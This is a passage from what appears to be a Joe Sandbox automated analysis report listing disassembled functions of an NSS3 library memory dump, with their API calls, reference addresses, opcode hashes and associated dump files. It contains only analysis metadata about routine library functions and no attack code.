                                                                                                                                                                                                                                                                                          • Instruction ID: 666fa2f9e83fc2037a45f08b07887a61c58dea79d39408e8d2b34e95860ce3ca
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F74162B2A402158FDB18CF28DCD179AB7E1BF4431871D4A69D84ADBB02E775E891CB81
                                                                                                                                                                                                                                                                                          Function 6C6DFFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3(00000000,?,?,?,6C6DFDFE), ref: 6C6DFFAD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6DF9C9,?,6C6DF4DA,6C6DF9C9,?,?,6C6A369A), ref: 6C67CA7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C67CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C67CB26
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C6DFDFE), ref: 6C6DFFDF
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C6DFDFE), ref: 6C6E001C
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C6DFDFE), ref: 6C6E006F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2358433136-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a94e2bee81e50551477aa26b5ff48a9958a9bea2d8c0b7eee3668b9ec0ccad8d
                                                                                                                                                                                                                                                                                          • Instruction ID: e9fd79c8ee30a07945c77b7a299aa059f9de14e932b9337b82e62f1cf9625f87
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a94e2bee81e50551477aa26b5ff48a9958a9bea2d8c0b7eee3668b9ec0ccad8d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A411171B052059BDF18DFA4D884AAEB774FF89308F14403AD80693701EB79A800CBE5
                                                                                                                                                                                                                                                                                          Function 6C7C7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C7E10
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C7EA6
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C7EB5
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C7C7ED8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                          • Instruction ID: 187852e2d1a84b56fab8bf7c43418d35a829e22aa964ba9bc3e7e232e57d064a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D731A2B2B002118FDB04CF09DD9099ABBA6BF88318B1A8579C8585B712EB71EC45CBD1
                                                                                                                                                                                                                                                                                          Function 6C77DF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C71AE42), ref: 6C7030AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7030C7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7030E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C703116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C70312B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PK11_DestroyObject.NSS3(?,?), ref: 6C703154
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C70317E
                                                                                                                                                                                                                                                                                          • SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C77DBBD), ref: 6C77DFCF
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77DFEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7186D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C718716
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7186D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C718727
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7186D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C71873B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7186D0: PR_Unlock.NSS3(?), ref: 6C71876F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7186D0: PR_SetError.NSS3(00000000,00000000), ref: 6C718787
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C73F854
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C73F868
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C73F882
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(04C483FF,?,?), ref: 6C73F889
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C73F8A4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C73F8AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C73F8C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73F820: free.MOZGLUE(280F10EC,?,?), ref: 6C73F8D0
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C77DBBD), ref: 6C77DFFC
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,6C77DBBD), ref: 6C77E007
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3730430729-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5ec9408a9bc1bd517a633cf2f4d134c4c5f240be660116c9a74e9c400daff928
                                                                                                                                                                                                                                                                                          • Instruction ID: 3e78abf5404e665374dd093821b1597e347ee8cd54ed8f567aa423d2972dcd6b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ec9408a9bc1bd517a633cf2f4d134c4c5f240be660116c9a74e9c400daff928
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB31E6B1B0420957DB209A799E8DA9B72A8AF6430CF050135E91997B53FB21D918C3F2
                                                                                                                                                                                                                                                                                          Function 6C6F6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6F6C8D
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6F6CA9
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6F6CC0
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C818FE0), ref: 6C6F6CFE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1bbbc2de88d3d536e10e85e424925cb3f559c00e812e2cfbcacebf6e2fd4c673
                                                                                                                                                                                                                                                                                          • Instruction ID: 37dab2def72355a82ac57a895395e58b4b9b3252a466baebf73bd853f222229c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bbbc2de88d3d536e10e85e424925cb3f559c00e812e2cfbcacebf6e2fd4c673
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF3180B1A012169FEB08CF65C895ABFBBF6EF45248B10442DD955D7710EB31D906CBA0
                                                                                                                                                                                                                                                                                          Function 6C804F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C804F5D
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C804F74
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C804F82
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C804F90
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$CreateErrorFileLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 17951984-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6ec5b52ce751a271d9ba8e65bbc7adec384cb71b045f24a97a34dba1ba4aeef2
                                                                                                                                                                                                                                                                                          • Instruction ID: 7165c2e6db580d14043a9d56eba3708af62f1406802c5736d6c13597aeec9ab1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ec5b52ce751a271d9ba8e65bbc7adec384cb71b045f24a97a34dba1ba4aeef2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC3137B5B402094BEB11DF69DD81BDBB3B8EFC534CF044629EC15A7381D734A908C6A1
                                                                                                                                                                                                                                                                                          Function 6C766DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C766E36
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C766E57
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C766E7D
                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C766EAA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3163584228-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1b2f68e204f8f46efdf38b27217e59a190ec0f70cd7de826609824b6164eb3bf
                                                                                                                                                                                                                                                                                          • Instruction ID: 8f1d1ed8ad52a7a4786c8ffa3564791495ca815a187a6b08a9a7fe125648c26a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b2f68e204f8f46efdf38b27217e59a190ec0f70cd7de826609824b6164eb3bf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF31C171610512EEDB141F36DE08396B7A8BB1131AF94063DDCA9E6E81EB31AA54CF81
                                                                                                                                                                                                                                                                                          Function 6C74DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C74DDB1,?,00000000), ref: 6C74DDF4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C74DDB1,?,00000000), ref: 6C74DE0B
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C74DDB1,?,00000000), ref: 6C74DE17
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C74DE80
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3725328900-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                          • Instruction ID: 35a66c6492afa8ea7910c8566afccccc98b089a395645aed12951564df9ad25e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C131C4B19017529BE700CF16D984A66F7E8BFB531CB24C22ED85C87B01EB71E5A4CB80
                                                                                                                                                                                                                                                                                          Function 6C73FE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(6C715ADC,?,00000000,00000001,?,?,00000000,?,6C70BA55,?,?), ref: 6C73FE4B
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C73FE5F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(78831D74), ref: 6C73FEC2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C73FED6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 64707d2d6bc925b7002cfecd7eedba3d08baad42bad989fcba904f55e54d3965
                                                                                                                                                                                                                                                                                          • Instruction ID: 1ea0f96f10556985fdd7410a9569e809169d36a2cc0bca0f812ec5e744c808ff
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64707d2d6bc925b7002cfecd7eedba3d08baad42bad989fcba904f55e54d3965
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C213131A40225ABDB10AE24DA4879AB3B8BF0539DF581174DC0967A93E730E828CBD1
                                                                                                                                                                                                                                                                                          Function 6C743F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PK11_GetAllTokens.NSS3 ref: 6C743481
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PR_SetError.NSS3(00000000,00000000), ref: 6C7434A3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: TlsGetValue.KERNEL32 ref: 6C74352E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: EnterCriticalSection.KERNEL32(?), ref: 6C743542
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PR_Unlock.NSS3(?), ref: 6C74355B
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C72E80C,00000000,00000000,?,?,?,?,6C738C5B,-00000001), ref: 6C743FA1
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C72E80C,00000000,00000000,?,?,?,?,6C738C5B,-00000001), ref: 6C743FBA
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C72E80C,00000000,00000000,?,?,?,?,6C738C5B,-00000001), ref: 6C743FFE
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3 ref: 6C74401A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
